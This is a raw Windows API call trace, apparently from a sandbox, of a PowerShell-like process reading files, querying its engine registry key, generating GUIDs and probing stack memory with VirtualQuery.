	[0298.619] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.621] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.621] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.621] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.621] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.631] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.632] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.632] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.632] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.632] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.633] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.633] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.633] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.633] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.633] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.634] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.634] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.634] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.635] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0xf37, lpOverlapped=0x0) returned 1
	[0298.635] ReadFile (in: hFile=0x334, lpBuffer=0x2e0d107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d107*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0298.635] ReadFile (in: hFile=0x334, lpBuffer=0x2e0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2e0da68*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0298.635] SetErrorMode (uMode=0x1) returned 0x1
	[0298.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0298.635] SetErrorMode (uMode=0x1) returned 0x1
	[0298.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0298.636] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x334) returned 0x0
	[0298.636] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0298.636] CoTaskMemAlloc (cb=0x5a) returned 0x3cf290
	[0298.636] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3cf290, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0298.636] CoTaskMemFree (pv=0x3cf290) 
	[0298.636] RegCloseKey (hKey=0x334) returned 0x0
	[0298.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0298.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0298.641] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe5d5e3de, Data2=0x7430, Data3=0x4c0b, Data4=([0]=0xad, [1]=0x88, [2]=0xd0, [3]=0x1c, [4]=0xba, [5]=0xe1, [6]=0xd8, [7]=0x39))) returned 0x0
	[0298.641] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x63594b62, Data2=0xc098, Data3=0x479f, Data4=([0]=0x9d, [1]=0x51, [2]=0xe, [3]=0x58, [4]=0x52, [5]=0x89, [6]=0xe0, [7]=0x85))) returned 0x0
	[0299.488] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x88dbbc1e, Data2=0x1372, Data3=0x4c20, Data4=([0]=0xa8, [1]=0x9f, [2]=0xef, [3]=0xb9, [4]=0x19, [5]=0x6e, [6]=0xbf, [7]=0x46))) returned 0x0
	[0299.489] VirtualQuery (in: lpAddress=0x12b1a0, lpBuffer=0x12c060, dwLength=0x30 | out: lpBuffer=0x12c060*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b230, lpBuffer=0x12c0f0, dwLength=0x30 | out: lpBuffer=0x12c0f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.489] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.490] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b5e0, lpBuffer=0x12c4a0, dwLength=0x30 | out: lpBuffer=0x12c4a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.491] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x35dd8ddd, Data2=0xe3a8, Data3=0x4ba8, Data4=([0]=0xbf, [1]=0x48, [2]=0x10, [3]=0x51, [4]=0x17, [5]=0x55, [6]=0x11, [7]=0x8))) returned 0x0
	[0299.492] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.492] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.492] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.492] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.492] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.493] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] VirtualQuery (in: lpAddress=0x12b5e0, lpBuffer=0x12c4a0, dwLength=0x30 | out: lpBuffer=0x12c4a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.494] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xd20d5c55, Data2=0xb21b, Data3=0x4fce, Data4=([0]=0xbd, [1]=0x84, [2]=0x15, [3]=0xcd, [4]=0x5e, [5]=0x79, [6]=0xbc, [7]=0x9e))) returned 0x0
	[0299.494] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb6b0312e, Data2=0xd138, Data3=0x48bc, Data4=([0]=0x92, [1]=0x29, [2]=0xa5, [3]=0x4d, [4]=0xba, [5]=0x29, [6]=0xcd, [7]=0xad))) returned 0x0
	[0299.495] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.495] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
